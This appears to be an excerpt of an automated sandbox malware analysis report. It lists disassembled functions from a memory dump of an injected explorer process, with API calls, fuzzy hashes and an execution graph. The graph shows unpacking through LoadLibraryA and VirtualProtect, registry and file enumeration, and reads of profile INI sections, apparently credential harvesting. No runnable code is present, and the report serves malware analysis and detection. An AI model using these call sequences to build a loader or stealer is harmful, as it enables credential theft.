                                                                                                                                                      • Instruction ID: f048ffd4bd239d95084bc11fbe7e027e0f2d3993a387f4b7554d1719619d07da
                                                                                                                                                      • Opcode Fuzzy Hash: b43b00130ed8dc4f00090e399434213a0aea3b94890fbf07f986d4154bdb11de
                                                                                                                                                      • Instruction Fuzzy Hash: 67E1D270E0C39A8BD7258F28E49076EBBE1AF9A308F14495DF8C1872D1D670ED45D792
                                                                                                                                                      Function 00A07A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                                      • Opcode ID: f8c2fc51d62505d70ed894b47089d443d5dbbb43bf4290ae4d495f103bb46c07
                                                                                                                                                      • Instruction ID: 82284475d2e7a088f1ee8ba29af66b36cecf6a6fccf067bf7f7f23970c453098
                                                                                                                                                      • Opcode Fuzzy Hash: f8c2fc51d62505d70ed894b47089d443d5dbbb43bf4290ae4d495f103bb46c07
                                                                                                                                                      • Instruction Fuzzy Hash: 03E1E170E0C39A8FD7258F28E49076EBBE1AF99308F18495DF8C1872D1D670E945D792
                                                                                                                                                      Function 00A077F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                                      • API String ID: 0-3447725786
                                                                                                                                                      • Opcode ID: 92a5e921161fddd606282e8c11703e2590ac9e4336501e3acc7b0aef0ae9eabf
                                                                                                                                                      • Instruction ID: 2bc5861101cd82ff39db6fcad506109d6c0d8df913c0a2f22584ae5f7afa5b51
                                                                                                                                                      • Opcode Fuzzy Hash: 92a5e921161fddd606282e8c11703e2590ac9e4336501e3acc7b0aef0ae9eabf
                                                                                                                                                      • Instruction Fuzzy Hash: AFE1D270E0C39A8FD7258F28E49076EBBE1AF99308F14495DF8C2872D1D670E945D792
                                                                                                                                                      Function 00A070C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00A0720E
                                                                                                                                                      • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00A07226
                                                                                                                                                      • _aulldvrm.NTDLL(00000000,00000000,?), ref: 00A0727B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _aulldvrm$_aullrem
                                                                                                                                                      • String ID: -x0$NaN
                                                                                                                                                      • API String ID: 105165338-3447725786
                                                                                                                                                      • Opcode ID: 42b3483068763589b5394e3b90286025d5060a35295803741e56e9196a0f5502
                                                                                                                                                      • Instruction ID: a2920081e9db8d9af087152e99fd2c413a15bc1573d4f6d3dcd09eeebd664ceb
                                                                                                                                                      • Opcode Fuzzy Hash: 42b3483068763589b5394e3b90286025d5060a35295803741e56e9196a0f5502
                                                                                                                                                      • Instruction Fuzzy Hash: 18D1E470E0C39A8FD7258F28A49076EBBE1AF99308F14495DF8C1872D1D670ED45D782
                                                                                                                                                      Function 00A0898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00A08AAD
                                                                                                                                                      • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00A08B66
                                                                                                                                                      • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00A08C9B
                                                                                                                                                      • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00A08CAE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _allmul$_alldvrm
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 115548886-248832578
                                                                                                                                                      • Opcode ID: afe99f237dd827f54eab3c8a37399e0ea1541c6e93dcbc2e335149aca513c469
                                                                                                                                                      • Instruction ID: 5d3432eaab9d36e8d4f39e6b83e63d89e4ddc38cc2c93d3916743ed9a7f6ab89
                                                                                                                                                      • Opcode Fuzzy Hash: afe99f237dd827f54eab3c8a37399e0ea1541c6e93dcbc2e335149aca513c469
                                                                                                                                                      • Instruction Fuzzy Hash: 98D1F6B190C78D8FD710DF59A48023EBBF0BB95351F04096EF6C5962C1DBB889458B8A
                                                                                                                                                      Function 00A2D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: ,$7$9
                                                                                                                                                      • API String ID: 2221118986-1653249994
                                                                                                                                                      • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                      • Instruction ID: c79207f83842d4322496dffc1a59ff547f577a3cbda45f9c4188c39591997da5
                                                                                                                                                      • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                      • Instruction Fuzzy Hash: C1316B715083949FD330DF64E840B8FBBE8AF85340F00892EF98997251EB75964CCBA2
                                                                                                                                                      Function 00A01BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BCC
                                                                                                                                                      • StrStrIW.SHLWAPI(00000000,.exe,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01BF0
                                                                                                                                                      • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C05
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00A02E75,PathToExe,00000000,00000000), ref: 00A01C1C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                      • String ID: .exe
                                                                                                                                                      • API String ID: 1659193697-4119554291
                                                                                                                                                      • Opcode ID: 6750fdfe820b908f78960d0177d76c9edd178e6b3e2dac5c056c4d9ad10a9e5f
                                                                                                                                                      • Instruction ID: e32c277743d2be0b9b0ba41c0532173a9c98ed5a7137c314cd279534e72a4ab1
                                                                                                                                                      • Opcode Fuzzy Hash: 6750fdfe820b908f78960d0177d76c9edd178e6b3e2dac5c056c4d9ad10a9e5f
                                                                                                                                                      • Instruction Fuzzy Hash: D8F0CD303507249AE324AF74BC45BFB62A4FF02342B20492AE046C71E1FBA0CC42C799
                                                                                                                                                      Function 00A12FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _allmul.NTDLL(?,00000000,00000018), ref: 00A1316F
                                                                                                                                                      • _allmul.NTDLL(-00000001,00000000,?,?), ref: 00A131D2
                                                                                                                                                      • _alldiv.NTDLL(?,?,00000000), ref: 00A132DE
                                                                                                                                                      • _allmul.NTDLL(00000000,?,00000000), ref: 00A132E7
                                                                                                                                                      • _allmul.NTDLL(?,00000000,?,?), ref: 00A13392
                                                                                                                                                        • Part of subcall function 00A116CD: memset.NTDLL ref: 00A1172B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _allmul$_alldivmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3880648599-0
                                                                                                                                                      • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                      • Instruction ID: 6f594ccb0c7faebf10c6a34d5dd84578f66f5e52a8cbd33725d081c29d73cf2d
                                                                                                                                                      • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                      • Instruction Fuzzy Hash: 5FD1A8726083019FCF24DF69C580BAEBBE1AF88704F14492DF9A587251DB70DE85CB82
                                                                                                                                                      Function 00A387FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                                      • API String ID: 0-384346570
                                                                                                                                                      • Opcode ID: ff0bdea17b9dc38d7c1aa2800127247f3906fd7e8f9850b1cbea34660376ee2e
                                                                                                                                                      • Instruction ID: 45057ee5b478f98a637396fa76050c3ad5075317a585549c69a68afb050d0d23
                                                                                                                                                      • Opcode Fuzzy Hash: ff0bdea17b9dc38d7c1aa2800127247f3906fd7e8f9850b1cbea34660376ee2e
                                                                                                                                                      • Instruction Fuzzy Hash: 79D13A707083109FD714DF28D981B2FBBEAABD8750F10892EF9458B291DB78D945CB92
                                                                                                                                                      Function 00A096BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00A096E7
                                                                                                                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00A09707
                                                                                                                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00A09739
                                                                                                                                                      • _alldiv.NTDLL(00000001,80000000,?,?), ref: 00A0976C
                                                                                                                                                      • _allmul.NTDLL(?,?,?,?), ref: 00A09798
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldiv$_allmul
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4215241517-0
                                                                                                                                                      • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                      • Instruction ID: 1a197f3663ff018c39212fb085b3681ddeabc8eca4a75208e10207dc5b516a6a
                                                                                                                                                      • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                      • Instruction Fuzzy Hash: E921493351471D1FD7345E1ABED0B2B3598DB94391F24452DFC11C22E3E9638C4180A2
                                                                                                                                                      Function 00A1B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _allmul.NTDLL(?,00000000,00000000), ref: 00A1B1B3
                                                                                                                                                      • _alldvrm.NTDLL(?,?,00000000), ref: 00A1B20F
                                                                                                                                                      • _allrem.NTDLL(?,00000000,?,?), ref: 00A1B28A
                                                                                                                                                      • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00A1B298
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1484705121-0
                                                                                                                                                      • Opcode ID: 944a35d3970c31694fb3e53e6b8623a892d57f10e00ff0735ed844553c2d97d3
                                                                                                                                                      • Instruction ID: a11024fb25f63d3819609ec94e1bd4f7f00232fcb9e303f4bf2d625421b7f204
                                                                                                                                                      • Opcode Fuzzy Hash: 944a35d3970c31694fb3e53e6b8623a892d57f10e00ff0735ed844553c2d97d3
                                                                                                                                                      • Instruction Fuzzy Hash: 8E4148716183019BC714EF25C9919AEBBE5BFD8340F04492DF98587262DB30EC89CB62
                                                                                                                                                      Function 00A01895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00A018A7
                                                                                                                                                      • GlobalLock.KERNEL32(00A04B57), ref: 00A018B6
                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 00A018F4
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A018E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1688112647-0
                                                                                                                                                      • Opcode ID: 20f0cd96a9ea2f1f91df2d42505e15f58b4260dc7b17066da3e027a538b1efdf
                                                                                                                                                      • Instruction ID: fbd96e4c64e42b791e3c3e9839267819aa8e42432e48ae35ce1520b6feab8e41
                                                                                                                                                      • Opcode Fuzzy Hash: 20f0cd96a9ea2f1f91df2d42505e15f58b4260dc7b17066da3e027a538b1efdf
                                                                                                                                                      • Instruction Fuzzy Hash: 78014B7560030AAFCB019F69ED189DF7BA9BF94391B00852EF845832A1DF31C9159A60
                                                                                                                                                      Function 00A01953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                      • lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                      • Opcode ID: 6519bb6a8da0ce3774927c7151ef976020536d7f985a5b442dcf36622aaab225
                                                                                                                                                      • Instruction ID: 4a749f96feaf2b7a468995cd0fed9dbf70ffd8e30c4e965a30854196c50da9e3
                                                                                                                                                      • Opcode Fuzzy Hash: 6519bb6a8da0ce3774927c7151ef976020536d7f985a5b442dcf36622aaab225
                                                                                                                                                      • Instruction Fuzzy Hash: 78E0656230021C2B8714B7AE6C94EBB769CDAD97A57490039FA05D3242E9569C0546B0
                                                                                                                                                      Function 00A2F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A06A81: memset.NTDLL ref: 00A06A9C
                                                                                                                                                      • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 00A2F2A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _aulldivmemset
                                                                                                                                                      • String ID: %llu$%llu
                                                                                                                                                      • API String ID: 714058258-4283164361
                                                                                                                                                      • Opcode ID: 6219c90729fc087b6714cd4e73d77bdeea57e02272514e56cc9370194d4b187d
                                                                                                                                                      • Instruction ID: 6b040f3e6602f40809e2460cd92244707fe208960fdbeaac48a58b3c2ec2c612
                                                                                                                                                      • Opcode Fuzzy Hash: 6219c90729fc087b6714cd4e73d77bdeea57e02272514e56cc9370194d4b187d
                                                                                                                                                      • Instruction Fuzzy Hash: 2A21D771A44619ABC710AA24DD42E6B7768AF81730F054638F921976C1DB21EC25C7E1
                                                                                                                                                      Function 00A1203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _allmul.NTDLL(?,00000000,?), ref: 00A12174
                                                                                                                                                      • _allmul.NTDLL(?,?,?,00000000), ref: 00A1220E
                                                                                                                                                      • _allmul.NTDLL(?,00000000,00000000,?), ref: 00A12241
                                                                                                                                                      • _allmul.NTDLL(00A02E26,00000000,?,?), ref: 00A12295
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _allmul
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4029198491-0
                                                                                                                                                      • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                      • Instruction ID: fa4a70ef6efbc9a85df499125bb219dced7721d2d7db0172cc24763788114dac
                                                                                                                                                      • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                      • Instruction Fuzzy Hash: 8FA19B707087059FC714EF64CA91AAEB7E6AFD8704F00492DF6958B291EB70EC958B42
                                                                                                                                                      Function 00A178B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                      • Opcode ID: a1a57c78eda1b93cd99c98a7b7300e16f4a30e668f8aa00f029a71a97e92ce0a
                                                                                                                                                      • Instruction ID: 81f62efd3d1c7582b440eb815d712af5d6a1c9cab8680e8294942f5dd1ee0f77
                                                                                                                                                      • Opcode Fuzzy Hash: a1a57c78eda1b93cd99c98a7b7300e16f4a30e668f8aa00f029a71a97e92ce0a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D818C7160C3149FC350DF28C980AAFBBF5EF88744F14592DF88A8B252E670E949CB91
                                                                                                                                                      Function 00A0190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A01946
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                      • Opcode ID: cdabca4f2d6c69035ba19db063999e0c94d48cd4eec18a8cad3a93c51923e404
                                                                                                                                                      • Instruction ID: 7297345cd443184ebc31cb6831c7f063068320963e9a6632817eb76503cab50a
                                                                                                                                                      • Opcode Fuzzy Hash: cdabca4f2d6c69035ba19db063999e0c94d48cd4eec18a8cad3a93c51923e404
                                                                                                                                                      • Instruction Fuzzy Hash: B4E09B5230031C1B472177BE6C94DBB76DCDAD57E63450135FD05C3202ED559C0546B0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:21.7%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:181
                                                                                                                                                      Total number of Limit Nodes:17
                                                                                                                                                      execution_graph 1119 9ba1f9 1120 9ba228 1119->1120 1122 9ba248 1119->1122 1123 9ba298 1120->1123 1128 9ba29d 1123->1128 1124 9ba385 LoadLibraryA 1124->1128 1126 9ba3e0 VirtualProtect VirtualProtect 1127 9ba46e 1126->1127 1127->1127 1128->1124 1128->1126 1129 9ba3d5 1128->1129 1129->1122 932 9ba298 937 9ba29d 932->937 933 9ba385 LoadLibraryA 933->937 935 9ba3e0 VirtualProtect VirtualProtect 936 9ba46e 935->936 936->936 937->933 937->935 938 9ba3d5 937->938 987 9b3608 992 9b3458 StrStrIW 987->992 990 9b3458 17 API calls 991 9b365d 990->991 993 9b348f 992->993 994 9b350f 992->994 1017 9b2774 993->1017 996 9b3523 RegOpenKeyExW 994->996 997 9b35e4 996->997 1003 9b354d 996->1003 998 9b1860 RtlFreeHeap 997->998 1001 9b35f7 998->1001 999 9b35b5 RegEnumKeyExW 999->997 999->1003 1000 9b34a8 1000->994 1002 9b3507 1000->1002 1030 9b28a0 1000->1030 1001->990 1004 9b1860 RtlFreeHeap 1002->1004 1003->999 1006 9b2700 RtlFreeHeap 1003->1006 1009 9b3458 14 API calls 1003->1009 1013 9b1860 RtlFreeHeap 1003->1013 1004->994 1006->1003 1008 9b34fa 1010 9b1860 RtlFreeHeap 1008->1010 1009->1003 1010->1002 1013->1003 1016 9b1860 RtlFreeHeap 1016->1008 1018 9b2793 1017->1018 1019 9b2797 RegOpenKeyExW 1017->1019 1018->1019 1020 9b27d5 RegQueryValueExW 1019->1020 1022 9b286b 1019->1022 1023 9b285b RegCloseKey 1020->1023 1025 9b27fe 1020->1025 1021 9b288d 1021->1000 1022->1021 1024 9b2774 RtlFreeHeap 1022->1024 1023->1021 1023->1022 1024->1021 1025->1023 1026 9b281a RegQueryValueExW 1025->1026 1027 9b2851 1026->1027 1028 9b2844 1026->1028 1029 9b1860 RtlFreeHeap 1027->1029 1028->1023 1029->1028 1032 9b28b9 1030->1032 1031 9b2922 1031->1008 1036 9b2700 1031->1036 1032->1031 1033 9b1860 RtlFreeHeap 1032->1033 1034 9b28df 1033->1034 1034->1031 1035 9b2774 5 API calls 1034->1035 1035->1034 1037 9b2712 1036->1037 1038 9b1860 RtlFreeHeap 1037->1038 1039 9b271d 1038->1039 1039->1008 1040 9b3254 1039->1040 1064 9b298c 1040->1064 1043 9b343a 1043->1016 1044 9b298c GetFileAttributesW 1047 9b3295 1044->1047 1045 9b342c 1073 9b30a8 1045->1073 1047->1043 1047->1045 1068 9b2938 1047->1068 1050 9b340c 1052 9b1860 RtlFreeHeap 1050->1052 1051 9b3304 GetPrivateProfileSectionNamesW 1051->1050 1061 9b331e 1051->1061 1053 9b3414 1052->1053 1054 9b1860 RtlFreeHeap 1053->1054 1055 9b341c 1054->1055 1056 9b1860 RtlFreeHeap 1055->1056 1057 9b3424 1056->1057 1059 9b1860 RtlFreeHeap 1057->1059 1058 9b334e GetPrivateProfileStringW 1060 9b3379 GetPrivateProfileIntW 1058->1060 1058->1061 1059->1045 1060->1061 1061->1050 1061->1058 1062 9b30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1061->1062 1063 9b1860 RtlFreeHeap 1061->1063 1062->1061 1063->1061 1065 9b2999 1064->1065 1067 9b29a9 1064->1067 1066 9b299e GetFileAttributesW 1065->1066 1065->1067 1066->1067 1067->1043 1067->1044 1069 9b2945 1068->1069 1070 9b2980 1068->1070 1069->1070 1071 9b294a CreateFileW 1069->1071 1070->1050 1070->1051 1071->1070 1072 9b2972 CloseHandle 1071->1072 1072->1070 1074 9b30cc 1073->1074 1075 9b30f1 FindFirstFileW 1074->1075 1076 9b3237 1075->1076 1083 9b3117 1075->1083 1077 9b1860 RtlFreeHeap 1076->1077 1078 9b323f 1077->1078 1079 9b1860 RtlFreeHeap 1078->1079 1080 9b3247 1079->1080 1080->1043 1081 9b2700 RtlFreeHeap 1081->1083 1082 9b3210 FindNextFileW 1082->1083 1084 9b3226 FindClose 1082->1084 1083->1081 1083->1082 1085 9b1860 RtlFreeHeap 1083->1085 1087 9b30a8 RtlFreeHeap 1083->1087 1088 9b1860 RtlFreeHeap 1083->1088 1089 9b2f7c 1083->1089 1084->1076 1085->1082 1087->1083 1088->1083 1099 9b2bc0 1089->1099 1092 9b3086 1092->1083 1094 9b307e 1095 9b1860 RtlFreeHeap 1094->1095 1095->1092 1096 9b2e04 RtlFreeHeap 1098 9b2fb6 1096->1098 1097 9b1860 RtlFreeHeap 1097->1098 1098->1092 1098->1094 1098->1096 1098->1097 1100 9b2bf3 1099->1100 1101 9b2700 RtlFreeHeap 1100->1101 1102 9b2c54 1101->1102 1103 9b2a54 RtlFreeHeap 1102->1103 1104 9b2c68 1103->1104 1105 9b2c7e 1104->1105 1106 9b1860 RtlFreeHeap 1104->1106 1107 9b1860 RtlFreeHeap 1105->1107 1106->1105 1113 9b2cb2 1107->1113 1108 9b2da3 1109 9b1860 RtlFreeHeap 1108->1109 1110 9b2dd9 1109->1110 1111 9b1860 RtlFreeHeap 1110->1111 1112 9b2de1 1111->1112 1112->1092 1115 9b2a54 1112->1115 1113->1108 1114 9b1860 RtlFreeHeap 1113->1114 1114->1108 1116 9b2a86 1115->1116 1117 9b1860 RtlFreeHeap 1116->1117 1118 9b2ad9 1116->1118 1117->1118 1118->1098 1130 9b3668 1131 9b3458 17 API calls 1130->1131 1132 9b369b 1131->1132 1133 9b3458 17 API calls 1132->1133 1134 9b36bd 1133->1134 1135 9ba1af 1136 9ba1bd 1135->1136 1137 9ba298 3 API calls 1136->1137 1138 9ba1cf 1136->1138 1137->1138 1139 9ba1e0 1140 